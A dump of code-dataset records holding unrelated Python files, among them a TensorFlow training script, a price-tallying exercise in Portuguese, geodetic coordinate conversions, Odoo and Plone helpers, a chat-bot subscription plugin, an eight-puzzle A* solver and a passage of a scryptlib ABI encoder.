tf.float32))\n\n init = tf.global_variables_initializer()\n saver = tf.train.Saver()\n\n return X, y, loss, training_op, accuracy ,init, saver\n\ndef generate_batch(images, labels, batch_size):\n size1 = batch_size // 2\n size2 = batch_size - size1\n if size1 != size2 and np.random.rand() > 0.5:\n size1, size2 = size2, size1\n X = []\n y = []\n while len(X) < size1:\n rnd_idx1, rnd_idx2 = np.random.randint(0, len(images), 2)\n if rnd_idx1 != rnd_idx2 and labels[rnd_idx1] == labels[rnd_idx2]:\n X.append(np.array([images[rnd_idx1], images[rnd_idx2]]))\n y.append([1])\n while len(X) < batch_size:\n rnd_idx1, rnd_idx2 = np.random.randint(0, len(images), 2)\n if labels[rnd_idx1] != labels[rnd_idx2]:\n X.append(np.array([images[rnd_idx1], images[rnd_idx2]]))\n y.append([0])\n rnd_indices = np.random.permutation(batch_size)\n return np.array(X)[rnd_indices], np.array(y)[rnd_indices]\n\n\ndef train():\n X_test1, y_test1 = generate_batch(X_test, y_test, batch_size=len(X_test))\n\n X, y, loss, training_op, accuracy, init, saver = build_graph(28*28, 1)\n\n n_epochs = 300\n batch_size = 500\n\n with tf.Session() as sess:\n init.run()\n for epoch in range(n_epochs):\n for iteration in range(mnist.train.num_examples // batch_size):\n X_batch, y_batch = generate_batch(X_train1, y_train1, batch_size)\n loss_val, _ = sess.run([loss, training_op], feed_dict={X: X_batch, y: y_batch})\n print(epoch, \"Train loss:\", loss_val)\n if epoch % 5 == 0:\n acc_test = accuracy.eval(feed_dict={X: X_test1, y: y_test1})\n print(epoch, \"Test accuracy:\", acc_test)\n\n save_path = saver.save(sess, \"./my_digit_comparison_model.ckpt\")\n\ntrain()\n\n","sub_path":"11_10_transfer_learning.py","file_name":"11_10_transfer_learning.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"42815532","text":"'''\nExercício Python 70: Crie um programa que leia o nome e o preço de vários produtos. O programa deverá perguntar se o\nusuário vai continuar ou não. No final, mostre:\n\nA) qual é o total gasto na compra.\n\nB) quantos produtos custam mais de R$1000.\n\nC) qual é o nome do produto mais barato.\n'''\n\nqtdprodutos = count = total = produtocaro = countprodutocaro = menor =0\nnomeprodutocaro = ' '\nnomeprodutobarato = ' '\nop = 's'\nwhile True:\n produto = str(input(\"Digite o nome do produto: \"))\n preco = float(input(\"Digite o preço do produto: R$\"))\n total += preco\n count += 1\n\n if preco > 1000:\n countprodutocaro += 1\n if preco < produtocaro:\n nomeprodutocaro = produto\n produtocaro = preco\n if count == 1 or preco < menor:\n menor = preco\n nomeprodutobarato = produto\n\n op = ' '\n while op not in 'SN':\n op = str(input(\"Deseja continuar a comprar? [S/N]\")).upper().strip()[0]\n\n if op not in 'S':\n break\n\nprint('{:-^40}'.format('Fim da compra'))\nprint(f'O Valor gasto na compra foi: R$ {total :.2f}')\nprint(f'Quantidade de produto que custam mais que R$1000,00 é: {countprodutocaro}')\nprint(f'Produto mais caro foi {nomeprodutocaro} e o preço foi R${produtocaro :.2f}')\nprint(f'O produto mais barato foi {nomeprodutobarato} e o preço dele R${menor :.2f}')","sub_path":"Arquivos Exercicios/Exercicios/Ex070.py","file_name":"Ex070.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"621252898","text":"import math\nfrom geompreds import orient2d, incircle\nfrom opendrivepy.point import Point\n\na = 6378137\nb = 6356752.3142\nf = (a - b) / a\ne_sq = f * (2-f)\n\ndef point_distance(pointa, pointb):\n return math.sqrt((pointa.x - pointb.x) ** 2 + (pointa.y - pointb.y) ** 2)\n\ndef line(p1, p2):\n A = (p1.y - p2.y)\n B = (p2.x - p1.x)\n C = (p1.x*p2.y - p2.x*p1.y)\n return A, B, -C\n\ndef intersection(L1, L2):\n D = L1[0] * L2[1] - L1[1] * L2[0]\n Dx = L1[2] * L2[1] - L1[1] * L2[2]\n Dy = L1[0] * L2[2] - L1[2] * L2[0]\n if D != 0:\n x = Dx / D\n y = Dy / D\n return Point(x,y)\n else:\n return False\n\ndef line_cross(line1, line2):\n L1 = line(line1[0], line1[1])\n L2 = line(line2[0], line2[1])\n\n R = intersection(L1, L2)\n if R:\n return R\n else:\n x1 = line1[0].x\n x2 = line1[1].x\n x3 = line2[0].x\n x4 = line2[1].x\n\n y1 = line1[0].y\n y2 = line1[1].y\n y3 = line2[0].y\n y4 = line2[1].y\n return Point((x1+x2+x3+x4)/4,(y1+y2+y3+y4)/4)\n\ndef orient_node(nodea, nodeb, nodec):\n return orient2d((nodea.x, nodea.y), (nodeb.x, nodeb.y), (nodec.x, nodec.y))\n\n\ndef find_diagonal(nodes):\n # find the diagonal node of node[0]\n if orient_node(nodes[0], nodes[1], nodes[2]) * orient_node(nodes[3], nodes[1], nodes[2]) < 0:\n return 3\n elif orient_node(nodes[0], nodes[1], nodes[3]) * orient_node(nodes[2], nodes[1], nodes[3]) < 0:\n return 2\n else:\n return 1\n\n\n\n\ndef enu_to_ecef(xEast, yNorth, zUp, lat0, lon0, h0):\n lamb = math.radians(lat0)\n phi = math.radians(lon0)\n s = math.sin(lamb)\n N = a / math.sqrt(1 - e_sq * s * s)\n\n sin_lambda = math.sin(lamb)\n cos_lambda = math.cos(lamb)\n sin_phi = math.sin(phi)\n cos_phi = math.cos(phi)\n\n x0 = (h0 + N) * cos_lambda * cos_phi\n y0 = (h0 + N) * cos_lambda * sin_phi\n z0 = (h0 + (1 - e_sq) * N) * sin_lambda\n\n t = cos_lambda * zUp - sin_lambda * yNorth\n\n zd = sin_lambda * zUp + cos_lambda * yNorth\n xd = cos_phi * t - sin_phi * xEast \n yd = sin_phi * t + cos_phi * xEast\n\n x = xd + x0 \n y = yd + y0 \n z = zd + z0 \n\n return x, y, z\n\ndef ecef_to_geodetic(x, y, z):\n # Convert from ECEF cartesian coordinates to \n # latitude, longitude and height. WGS-84\n x2 = x ** 2 \n y2 = y ** 2 \n z2 = z ** 2 \n\n a = 6378137.0000 # earth radius in meters\n b = 6356752.3142 # earth semiminor in meters \n e = math.sqrt (1-(b/a)**2) \n b2 = b*b \n e2 = e ** 2 \n ep = e*(a/b) \n r = math.sqrt(x2+y2) \n r2 = r*r \n E2 = a ** 2 - b ** 2 \n F = 54*b2*z2 \n G = r2 + (1-e2)*z2 - e2*E2 \n c = (e2*e2*F*r2)/(G*G*G) \n s = ( 1 + c + math.sqrt(c*c + 2*c) )**(1/3) \n P = F / (3 * (s+1/s+1)**2 * G*G) \n Q = math.sqrt(1+2*e2*e2*P) \n ro = -(P*e2*r)/(1+Q) + math.sqrt((a*a/2)*(1+1/Q) - (P*(1-e2)*z2)/(Q*(1+Q)) - P*r2/2) \n tmp = (r - e2*ro) ** 2 \n U = math.sqrt( tmp + z2 ) \n V = math.sqrt( tmp + (1-e2)*z2 ) \n zo = (b2*z)/(a*V) \n\n height = U*( 1 - b2/(a*V) ) \n \n lat = math.atan( (z + ep*ep*zo)/r ) \n\n temp = math.atan(y/x) \n if x >=0 : \n long = temp \n elif (x < 0) & (y >= 0):\n long = math.pi + temp \n else :\n long = temp - math.pi \n\n lat0 = lat/(math.pi/180) \n lon0 = long/(math.pi/180) \n h0 = height \n\n return lat0, lon0, h0\n\ndef enu_to_geodetic(xEast, yNorth, zUp, lat_ref, lon_ref, h_ref):\n\n x,y,z = enu_to_ecef(xEast, yNorth, zUp, lat_ref, lon_ref, h_ref)\n\n return ecef_to_geodetic(x,y,z)","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"332486176","text":"# -*- coding: utf-8 -*-\nfrom datetime import date\nimport logging\n\nfrom odoo import api\n\n_logger = logging.getLogger(__name__)\n\n\ndef get_sequence(cr, uid, code):\n env = api.Environment(cr, uid, {})\n ir_sequence = env['ir.sequence']\n sequence_name = code\n sequence_value = ir_sequence.get(sequence_name)\n if not sequence_value:\n args = {\n 'name': sequence_name,\n 'code': sequence_name,\n 'implementation': 'no_gap',\n 'padding': 4,\n }\n ir_sequence.create(args)\n sequence_value = ir_sequence.get(sequence_name)\n return sequence_name + sequence_value\n","sub_path":"izi_pos_revenue_allocation/models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"623199399","text":"import yaml\nimport os\n\n\nclass Config:\n\n _instance = None\n\n __slots__ = [\n '_path',\n \n 'DEBUG',\n 'PORT',\n 'HOST',\n\n 'DBHOST',\n 'DBPORT',\n 'DBNAME',\n 'DBUSER',\n 'DBPASSWORD',\n ]\n\n def __init__(self, yaml_file: str):\n self._path = yaml_file\n self._read()\n\n def __call__(cls, *args, **kwargs):\n if cls is not cls._instance:\n instance = super().__call__(*args, **kwargs)\n cls._instance = instance\n return cls._instance\n \n def to_dict(self):\n return {field.lower(): getattr(self, field) for field in self.__slots__}\n\n def _read(self):\n if not os.path.exists(self._path):\n raise AttributeError(f\"Config yaml doesnot exist: {self._path}\")\n\n with open(self._path) as config_file:\n config_content = config_file.read()\n config_yaml = yaml.safe_load(config_content)\n\n for k, v in config_yaml.items():\n k = k.upper()\n if k in self.__slots__:\n setattr(self, k, v)","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"631945665","text":"# -*- coding: utf-8 -*-\n\"\"\"Module providing faculty member assignment functionality\"\"\"\nfrom Acquisition import aq_inner\nfrom plone import api\nfrom plone.protect.utils import addTokenToUrl\nfrom Products.Five.browser import BrowserView\nfrom zope.lifecycleevent import modified\nfrom zope.publisher.interfaces.browser import IPublishTraverse\nfrom zope.interface import implementer\n\nfrom hph.faculty.facultymember import IFacultyMember\n\nfrom hph.publications import MessageFactory as _\n\n\nclass FacultyMemberAssignment(BrowserView):\n \"\"\" Manage publication faculty member assignments \"\"\"\n\n def __call__(self):\n return self.render()\n\n @property\n def traverse_subpath(self):\n return self.subpath\n\n def publishTraverse(self, request, name):\n if not hasattr(self, 'subpath'):\n self.subpath = []\n self.subpath.append(name)\n return self\n\n def render(self):\n return self.index()\n\n def generate_protected_url(self, url):\n return addTokenToUrl(url)\n\n def selectable_faculty_members(self):\n faculty_members = api.content.find(\n context=api.portal.get(),\n object_provides=IFacultyMember,\n review_state='published',\n sort_on='lastname'\n )\n return faculty_members\n\n def has_active_assignment(self, uuid):\n context = aq_inner(self.context)\n context_uid = api.content.get_uuid(obj=context)\n faculty_member = api.content.get(UID=uuid)\n assignments = getattr(faculty_member, 'associatedPublications', None)\n if assignments and context_uid in assignments:\n return True\n return False\n\n\n@implementer(IPublishTraverse)\nclass FacultyMemberAssignmentFactory(BrowserView):\n \"\"\" Factory view to set and delete assignments \"\"\"\n\n def __call__(self):\n return self.render()\n\n @property\n def traverse_subpath(self):\n return self.subpath\n\n def publishTraverse(self, request, name):\n if not hasattr(self, 'subpath'):\n self.subpath = []\n self.subpath.append(name)\n return self\n\n def render(self):\n context = aq_inner(self.context)\n faculty_member_uid = self.traverse_subpath[0]\n action = self.traverse_subpath[1]\n faculty_member = api.content.get(UID=faculty_member_uid)\n assignments = getattr(faculty_member, 'associatedPublications', None)\n if assignments is None:\n assignments = list()\n uuid = api.content.get_uuid(obj=context)\n if action == 'remove':\n if uuid in assignments:\n assignments.remove(uuid)\n else:\n assignments.append(uuid)\n # Store updated assignment list\n setattr(faculty_member, 'associatedPublications', assignments)\n modified(faculty_member)\n faculty_member.reindexObject(idxs='modified')\n next_url = '{0}/@@faculty-member-assignment?updated=true'.format(\n context.absolute_url())\n api.portal.show_message(\n message=_(u\"Faculty member successfully assigned\"),\n request=self.request)\n return self.request.response.redirect(next_url)\n","sub_path":"src/hph.publications/hph/publications/browser/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"86321070","text":"import asyncio\nfrom typing import Optional\n\nfrom loguru import logger\nfrom nonebot import CommandGroup, CommandSession\nfrom nonebot import permission as perm\nfrom nonebot.command import call_command\nfrom nonebot.command.argfilter import controllers, extractors, validators\n\n\nfrom app.services.subscribe.school_notice import get_rss_list\nfrom app.services.subscribe.score import get_score_subscribes\nfrom app.services.subscribe.wrapper import handle_message, get_subs, handle_rm\n\n__plugin_name__ = \"订阅\"\n__plugin_short_description__ = \"订阅 通知/成绩/考试 等,命令: subscribe\"\n__plugin_usage__ = r\"\"\"添加订阅:\n - 订阅\n - 添加订阅\n - 新建订阅\n - subscribe\n 然后会提示输入序号,你也可以直接在后面加上序号,如:\n - 订阅 1\n查看订阅:\n - 查看订阅\n - 订阅列表\n - subscribe show\n\n移除订阅:\n - 移除订阅\n - 取消订阅\n - 停止订阅\n - 删除订阅\n - subscribe rm\n 然后会提示输入序号,你也可以直接在后面加上序号,如:\n - 移除订阅 1\n - 移除订阅 all\n\"\"\".strip()\n\ncg = CommandGroup(\n \"subscribe\", permission=perm.PRIVATE | perm.GROUP_ADMIN | perm.DISCUSS\n)\n\n\ndef get_subscribe_lst() -> str:\n msg = \"\"\n msg += get_rss_list().strip() + \"\\n\"\n msg += get_score_subscribes().strip() + \"\\n\"\n\n return msg\n\n\n@cg.command(\n \"subscribe\", aliases=[\"subscribe\", \"订阅\", \"添加订阅\", \"新增订阅\", \"新建订阅\"], only_to_me=False\n)\nasync def subscribe(session: CommandSession):\n message = session.get(\n \"message\",\n prompt=f\"你想订阅什么内容呢?(请输入序号,也可输入 `取消、不` 等语句取消):\\n{get_subscribe_lst()}\",\n arg_filters=[\n controllers.handle_cancellation(session),\n str.lstrip,\n validators.not_empty(\"请输入有效内容哦~\"),\n ],\n )\n await handle_message(session.event, message)\n\n\n@subscribe.args_parser\nasync def _(session: CommandSession):\n if session.is_first_run:\n if session.current_arg:\n session.state[\"message\"] = session.current_arg\n return\n\n\n@cg.command(\"show\", aliases=[\"查看订阅\", \"我的订阅\", \"订阅列表\"], only_to_me=False)\nasync def _(session: CommandSession):\n subs = session.state.get(\"subs\") or await get_subs(session.event)\n\n if not subs:\n session.finish(\"你还没有订阅任何内容哦\")\n\n for k, v in subs.items():\n await session.send(format_subscription(k, v))\n await asyncio.sleep(0.05)\n session.finish(f\"以上是所有的 {len(subs)} 个订阅\")\n\n\n@cg.command(\"rm\", aliases=[\"取消订阅\", \"停止订阅\", \"关闭订阅\", \"删除订阅\", \"移除订阅\"], only_to_me=False)\nasync def unsubscribe(session: CommandSession):\n subs = await get_subs(session.event)\n logger.info(f\"subs: {subs}\",)\n index: Optional[str] = session.state.get(\"index\")\n logger.info(f\"session.state: {session.state}\",)\n if index is None:\n session.state[\"subs\"] = subs\n await call_command(\n session.bot,\n session.ctx,\n (\"subscribe\", \"show\"),\n args={\"subs\": subs},\n disable_interaction=True,\n )\n\n if not subs:\n session.finish()\n\n index = session.get(\n \"index\",\n prompt=\"你想取消哪一个订阅呢?(请发送序号,或者 `取消`)\",\n arg_filters=[\n extractors.extract_text,\n controllers.handle_cancellation(session),\n ],\n )\n\n if index:\n await handle_rm(session.event, index)\n\n\n@unsubscribe.args_parser\nasync def _(session: CommandSession):\n if session.is_first_run:\n if session.current_arg:\n session.state[\"index\"] = session.current_arg\n\n\ndef format_subscription(k, v) -> str:\n return f\"序号:{k}\\n\" f\"订阅名称:\" f\"{v}\\n\"\n","sub_path":"app/bot/subscribe/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"487394129","text":"'''\nCreated on Jan 15, 2014\n\n@author: tariktosun\n'''\nfrom Embedding.SmoresModule import SmoresModule\nfrom Embedding.SmoresDesign import SmoresDesign\nimport copy\n\n\ndef setUpGrasperWalker(test_object):\n '''\n Sets up fixtures for the grasper and walker designs in the test class given n \n as arg.\n '''\n ''' Grasper design: '''\n g_modules = [SmoresModule('1', 0, []),\n SmoresModule('2', 1, [3,2]),\n SmoresModule('3', 1, [3,2]),\n SmoresModule('4', 1, [3,0,2]),\n SmoresModule('5', 1, [3,2]),\n SmoresModule('6', 1, [3,2]),\n SmoresModule('7', 1, [3,0,2]),\n ]\n g_small = copy.deepcopy( g_modules )\n g_smaller = copy.deepcopy( g_modules )\n # The -1's here are to make the code more readable when compared with the\n # original drawings of the designs I made (where modules numbers start at 1\n # rather than 0)\n g_modules[1-1].add_child_module( 2, g_modules[5-1] )\n g_modules[1-1].add_child_module( 3, g_modules[2-1] )\n g_modules[2-1].add_child_module( 0, g_modules[3-1] )\n g_modules[3-1].add_child_module( 0, g_modules[4-1] )\n g_modules[5-1].add_child_module( 0, g_modules[6-1] )\n g_modules[6-1].add_child_module( 0, g_modules[7-1] )\n grasper = SmoresDesign( g_modules[1-1], g_modules )\n test_object.grasper = grasper\n \n # now make a smaller version:\n g_small[1-1].add_child_module( 2, g_small[5-1] )\n #g_small[1-1].add_child_module( 3, g_small[2-1] )\n g_small[5-1].nodes[0].active = False #need to hack this for it to work.\n #grasper_small = SmoresDesign( g_small[1-1], [g_small[1-1], g_small[2-1], g_small[5-1]])\n grasper_small = SmoresDesign( g_small[1-1], [g_small[1-1], g_small[5-1]])\n test_object.grasper_small = grasper_small\n \n # ...and an even smaller version:\n grasper_smaller = SmoresDesign( g_smaller[1-1], [g_smaller[1-1]] )\n test_object.grasper_smaller = grasper_smaller\n \n ''' Walker design: '''\n w_modules = [SmoresModule('1', 1, [2,3,0] ),\n SmoresModule('2', 1, [2,3] ),\n SmoresModule('3', 1, [2,3] ),\n \n SmoresModule('4', 3, [2] ),\n \n SmoresModule('5', 0, [2,3] ),\n SmoresModule('6', 0, [2,3] ),\n SmoresModule('7', 0, [2,3] ),\n \n SmoresModule('8', 0, [2,3] ),\n SmoresModule('9', 0, [2,3] ),\n SmoresModule('10', 0, [2,3] ),\n \n SmoresModule('11', 2, [3] ),\n \n SmoresModule('12', 1, [2,3] ),\n SmoresModule('13', 1, [2,3] ),\n SmoresModule('14', 1, [2,3,0] ),\n ]\n \n w_small = copy.deepcopy( w_modules )\n w_smaller = copy.deepcopy( w_modules )\n \n # First I am connecting the bottom legs (which will be the grasper)\n # right leg:\n w_modules[11-1].add_child_module( 0, w_modules[12-1] )\n w_modules[12-1].add_child_module( 0, w_modules[13-1] )\n w_modules[13-1].add_child_module( 0, w_modules[14-1] )\n # left leg:\n w_modules[11-1].add_child_module( 1, w_modules[10-1] )\n w_modules[10-1].add_child_module( 1, w_modules[9-1] )\n w_modules[9-1].add_child_module( 1, w_modules[8-1] )\n # now for the top two legs:\n #right leg:\n w_modules[11-1].add_child_module( 2, w_modules[4-1] )\n # Note that above is allowed because 11 is the root module.\n w_modules[4-1].add_child_module( 0, w_modules[3-1] )\n w_modules[3-1].add_child_module( 0, w_modules[2-1] )\n w_modules[2-1].add_child_module( 0, w_modules[1-1] )\n # left leg:\n w_modules[4-1].add_child_module( 1, w_modules[5-1] )\n w_modules[5-1].add_child_module( 1, w_modules[6-1] )\n w_modules[6-1].add_child_module( 1, w_modules[7-1] )\n # Node 11 is the root.\n walker = SmoresDesign( w_modules[11-1], w_modules ) \n test_object.walker= walker\n \n # now make a small version:\n w_small[11-1].add_child_module( 0, w_small[12-1] )\n w_small[11-1].add_child_module( 1, w_small[10-1] )\n walker_small = SmoresDesign( w_small[11-1], [w_small[11-1], w_small[12-1], w_small[10-1]])\n test_object.walker_small = walker_small\n \n # ... and an even smaller version:\n w_smaller[11-1].add_child_module( 1, w_smaller[10-1] )\n walker_smaller = SmoresDesign( w_smaller[11-1], [ w_smaller[11-1], w_smaller[10-1] ])\n test_object.walker_smaller = walker_smaller\n \n \n \n \n \n ","sub_path":"Design_Merging/test/fixtures_grasper_walker.py","file_name":"fixtures_grasper_walker.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"123137840","text":"# Name: Hieu Le - htl5683@truman.edu\n# Name: Anh Nguyen - adn6627@truman.edu\n\n# File eightPuzzle.py\n# Implements the Eight Puzzle problem for state space search\n\n# Node Expansions\n# Problem | BFS | A*(tiles) | A*(dist) | Steps\n# A 7 3 3 2\n# B 69 8 7 6\n# C 183 18 9 8\n# D 807 40 24 10\n# E 831 40 24 10\n# F 1557 95 18 12\n# G 6005 269 46 15\n# H 46690 3616 183 20\n\n\nfrom informedSearch import *\n\n\nclass EightPuzzleState(InformedProblemState):\n \"\"\"\n Each state in the Eight Puzzle problem is characterized by a 2-dimensional\n array representing the puzzle grid. The grid is filled with numbers from 0\n to 9 with the blank square denoted with a 0 value.\n \"\"\"\n\n def __init__(self, grid):\n self.grid = grid\n if grid is not None:\n # Extract the position of the blank square from the current grid.\n self.blank_row, self.blank_col = self.find_position(0)\n\n def __str__(self):\n \"\"\"Returns a string representation of this state\"\"\"\n rep = \"\"\n for row in range(len(self.grid)):\n for col in range(len(self.grid[row])):\n rep += '%s ' % self.grid[row][col]\n rep += '\\n'\n return rep\n\n def illegal(self):\n \"\"\"Tests whether this state is illegal\"\"\"\n return self.grid is None\n\n def equals(self, state):\n \"\"\"\n Determines whether the state instance and the given state are equal\n \"\"\"\n return self.grid == state.grid\n\n # Each operator corresponds to shifting the blank square in each of the four\n # possible directions. This induces changes in the row and column number of\n # the blank square.\n OPERATORS = [[-1, 0], [0, 1], [1, 0], [0, -1]]\n\n def operatorNames(self):\n \"\"\"\n Returns a list of operator names in the same order as the applyOperators\n method. The returned name corresponds to the action applied on the\n numbered square that is moved into the blank square.\n \"\"\"\n return ['Slide Down', 'Slide Left', 'Slide Up', 'Slide Right']\n\n def applyOperators(self):\n \"\"\"\n Returns a list of possible successors to the current state, some of\n which maybe illegal.\n \"\"\"\n next_states = []\n\n for operator in self.OPERATORS:\n next_board = [row[:] for row in self.grid]\n # Compute the new position of the blank square.\n next_blank_row = self.blank_row + operator[0]\n next_blank_col = self.blank_col + operator[1]\n\n if (0 <= next_blank_row < len(next_board)\n and 0 <= next_blank_col < len(next_board[next_blank_row])):\n # Exchange two adjacent squares.\n next_board[self.blank_row][self.blank_col], \\\n next_board[next_blank_row][next_blank_col] = \\\n next_board[next_blank_row][next_blank_col], \\\n next_board[self.blank_row][self.blank_col]\n next_states.append(EightPuzzleState(next_board))\n else:\n next_states.append(EightPuzzleState(None))\n\n return next_states\n\n def heuristic(self, goal):\n \"\"\"Returns the estimated cost of reaching the goal from this state.\"\"\"\n # return 0\n # return self.get_hamming_distance(goal)\n return self.get_manhattan_distance(goal)\n\n def get_hamming_distance(self, other):\n \"\"\"\n Computes the Hamming distance from this state to other, i.e. the number\n of out-of-place squares\n \"\"\"\n hamming_distance = 0\n for value in range(1, 9):\n actual_row, actual_col = self.find_position(value)\n expected_row, expected_col = other.find_position(value)\n if not (actual_row == expected_row and actual_col == expected_col):\n hamming_distance += 1\n return hamming_distance\n\n def get_manhattan_distance(self, other):\n \"\"\"Computes the Manhattan distance from this state to other\"\"\"\n manhattan_distance = 0\n\n for value in range(1, 9):\n actual_row, actual_col = self.find_position(value)\n expected_row, expected_col = other.find_position(value)\n manhattan_distance += abs(expected_row - actual_row)\n manhattan_distance += abs(expected_col - actual_col)\n\n return manhattan_distance\n\n def find_position(self, value):\n \"\"\"Returns row and column number of the cell containing value\"\"\"\n for row in range(len(self.grid)):\n for col in range(len(self.grid[row])):\n if self.grid[row][col] == value:\n return row, col\n return -1, -1\n\n\ngoalState = EightPuzzleState(\n [[1, 2, 3],\n [8, 0, 4],\n [7, 6, 5]])\n\ninitialStateBoards = [\n [[1, 3, 0],\n [8, 2, 4],\n [7, 6, 5]],\n\n [[1, 3, 4],\n [8, 6, 2],\n [0, 7, 5]],\n\n [[0, 1, 3],\n [4, 2, 5],\n [8, 7, 6]],\n\n [[7, 1, 2],\n [8, 0, 3],\n [6, 5, 4]],\n\n [[8, 1, 2],\n [7, 0, 4],\n [6, 5, 3]],\n\n [[2, 6, 3],\n [4, 0, 5],\n [1, 8, 7]],\n\n [[7, 3, 4],\n [6, 1, 5],\n [8, 0, 2]],\n\n [[7, 4, 5],\n [6, 0, 3],\n [8, 1, 2]]\n]\n\nInformedSearch(EightPuzzleState(initialStateBoards[0]), goalState)\n","sub_path":"heuristic-search/eightPuzzle.py","file_name":"eightPuzzle.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"21221688","text":"import copy\nimport re\nfrom bitcoinx import TxInputContext, InterpreterLimits, MinerPolicy, Script, pack_byte\n\nimport scryptlib.utils as utils\nfrom scryptlib.compiler_wrapper import ABIEntityType\nfrom scryptlib.types import Struct, Int, Bool\n\n\nclass ABICoder:\n\n def __init__(self, abi, aliases):\n self.abi = abi\n self.aliases = aliases\n\n def encode_constructor_call(self, contract, hex_script, *args):\n abi_constructor = self.abi_constructor()\n c_params = self.__get_abi_params(abi_constructor)\n\n if len(args) != len(c_params):\n raise Exception('Wrong number of arguments passed to constructor. ' \\\n 'Expected {}, but got {}.'.format(len(c_params), len(args)))\n\n _c_params = []\n _args = []\n for idx, param in enumerate(c_params):\n arg = args[idx]\n arg = utils.primitives_to_scrypt_types(arg)\n resolved_type = utils.resolve_type(param['type'], self.aliases)\n if utils.is_array_type(resolved_type):\n elem_type, array_sizes = utils.factorize_array_type_str(resolved_type)\n\n if not utils.check_array(arg, elem_type, array_sizes):\n raise Exception('Constructors parameter with index {} should be of type \"{}\".'.format(idx, resolved_type))\n\n flattened_arr = utils.flatten_array(arg, param['name'], resolved_type)\n for obj in flattened_arr:\n _c_params.append({ 'name': obj['name'], 'type': obj['type'] })\n _args.append(obj['value'])\n elif utils.is_struct_type(resolved_type):\n if arg.final_type != resolved_type:\n raise Exception('Constructors parameter with index {} should be Struct object of type \"{}\". ' \\\n 'Got struct of type \"{}\" instead.'.format(idx, param['type'], arg.type_str))\n\n flattened_struct = utils.flatten_struct(arg, param['name'])\n for obj in flattened_struct:\n _c_params.append({ 'name': obj['name'], 'type': obj['type'] })\n _args.append(obj['value'])\n else:\n _c_params.append(param)\n _args.append(arg)\n\n finalized_hex_script = hex_script\n for idx, param in enumerate(_c_params):\n if not '<{}>'.format(param['name']) in hex_script:\n raise Exception('Missing \"{}\" contract constructor parameter in passed args.'.format(param['name']))\n param_regex = re.compile(escape_str_for_regex('<{}>'.format(param['name'])))\n finalized_hex_script = re.sub(param_regex, self.encode_param(_args[idx], param), finalized_hex_script)\n\n # Replace inline assembly variable placeholders in locking script with the actual arguments.\n # TODO: Check if each value if instance of ScryptType\n if contract.inline_asm_vars:\n for key, val in contract.inline_asm_vars.items():\n param_regex = re.compile(escape_str_for_regex('<{}>'.format(key)))\n finalized_hex_script = re.sub(param_regex, val.hex, finalized_hex_script)\n\n locking_script = Script.from_hex(finalized_hex_script)\n return FunctionCall('constructor', args, contract, locking_script=locking_script)\n\n def encode_pub_function_call(self, contract, name, *args):\n for entity in self.abi:\n if entity['name'] == name:\n if len(entity['params']) != len(args):\n raise Exception('Wrong number of arguments passed to function call \"{}\", ' \\\n 'expected {}, but got {}.'.format(name, len(entity['params']), len(args)))\n hex_script = self.encode_params(args, entity['params'])\n if len(self.abi) > 2 and 'index' in entity:\n pub_func_index = entity['index']\n hex_script += '{}'.format(Int(pub_func_index).hex) # TODO\n unlocking_script = Script.from_hex(hex_script) \n return FunctionCall(name, args, contract, unlocking_script=unlocking_script)\n\n def encode_params(self, args, param_entities):\n res = []\n for idx, arg in enumerate(args):\n res.append(self.encode_param(arg, param_entities[idx]))\n return ''.join(res)\n\n def encode_param(self, arg, param_entity):\n resolved_type = utils.resolve_type(param_entity['type'], self.aliases)\n if utils.is_array_type(resolved_type):\n if isinstance(arg, list):\n return self.encode_param_array(arg, param_entity)\n else:\n scrypt_type = arg.type_str\n raise Exception('Expected parameter \"{}\" as \"{}\", but got \"{}\".'.format(param_entity['name'],\n resolved_type, scrypt_type))\n if utils.is_struct_type(resolved_type):\n if isinstance(arg, Struct):\n if resolved_type != arg.final_type:\n raise Exception('Expected struct of type \"{}\", but got struct of type \"{}\".'.format(\n param_entity['name'], resolved_type, arg.final_type))\n else:\n scrypt_type = arg.type_str\n raise Exception('Expected parameter \"{}\" as struct of type \"{}\", but got \"{}\".'.format(\n param_entity['name'], resolved_type, scrypt_type))\n\n scrypt_type = utils.type_of_arg(arg)\n if resolved_type != scrypt_type:\n raise Exception('Wrong argument type. Expected \"{}\", but got \"{}\".'.format(param_entity['type'], \n scrypt_type))\n\n if isinstance(arg, bool):\n arg = Bool(arg)\n elif isinstance(arg, int):\n arg = Int(arg)\n\n return arg.hex\n\n def encode_param_array(self, args, param_entity):\n if len(args) == 0:\n raise Exception('Empty arrays not allowed.')\n \n first_arg_type = type(args[0])\n for arg in args:\n if type(arg) != first_arg_type:\n raise Exception('Array arguments are not of same type.')\n\n resolved_type = utils.resolve_type(param_entity['type'], self.aliases)\n elem_type, array_sizes = utils.factorize_array_type_str(resolved_type)\n\n if not utils.check_array(args, elem_type, array_sizes):\n raise Exception('Array check failed for \"{}\".'.format(param_entity['type']))\n\n res_buff = []\n for arg in utils.flatten_array(args, param_entity['name'], resolved_type):\n res_buff.append(self.encode_param(arg['value'], { 'name': arg['name'], 'type': arg['type'] }))\n return ''.join(res_buff)\n\n def abi_constructor(self):\n constructor_abi = None\n for entity in self.abi:\n if entity['type'] == ABIEntityType.CONSTRUCTOR.value:\n constructor_abi = entity\n break\n return 